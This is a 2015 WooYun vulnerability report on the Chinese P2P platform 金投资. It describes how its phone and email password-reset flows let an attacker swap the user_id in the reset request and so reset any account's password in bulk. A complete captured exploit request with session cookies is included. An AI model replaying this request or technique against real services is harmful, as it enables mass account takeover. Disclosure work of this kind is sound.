当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0118592

漏洞标题:p2p之金投资两处逻辑缺陷影响任意用户

相关厂商:金投资

漏洞作者: BMa

提交时间:2015-06-12 18:27

修复时间:2015-07-27 18:28

公开时间:2015-07-27 18:28

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-12: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-07-27: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

p2p之金投资两处逻辑缺陷影响任意用户
这次更加方便,批量

详细说明:

2.

1.jpg


先让一个正常用户进入到提交密码的阶段

2.jpg


此时抓包可以看到一个user_id和hash

3.jpg


POST /index.php/user/DoResetPassword.html HTTP/1.1
Host: www.p2p222.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.p2p222.com/index.php/user/ResetPassword.html?e8701ad48ba05a91604e480dd60899a3=carwAZnufs%2BDmlIYLvel%2BA%3D%3D&referer=phone
Cookie: __cfduid=d2ee387663c468f5076a5309c1f9bd4d11433559656; PHPSESSID=heke6faunh20phg1g3bl6ie7g5; Hm_lvt_e29aec143162fc1ca52145771a9ee305=1433559658,1433560143; Hm_lpvt_e29aec143162fc1ca52145771a9ee305=1433562460; CNZZDATA5958842=cnzz_eid%3D1286134438-1433559660-http%253A%252F%252Fwww.wooyun.org%252F%26ntime%3D1433559660
X-Forwarded-For: 8.8.8.8
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 139
user_id=9574&referer=phone&password=bma12345&repassword=bma12345&__hash__=61c99dcfc5b5679190ade27c87d093ff_88a3da3bff0e81ee3a44b2abdc94dc09


hash不用管他,替换user_id即可,这里可以遍历所有user_id,实现批量重置所有用户密码

4.jpg


重置成功,登录

5.jpg


6.jpg

漏洞证明:

3.邮箱任意密码重置

1.jpg


通过邮箱找回

2.jpg


打开链接,输入密码

3.jpg


4.jpg


修改user_id,可以遍历批量修改

5.jpg


修改成功并登录

6.jpg


7.jpg


修复方案:

版权声明:转载请注明来源 BMa@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)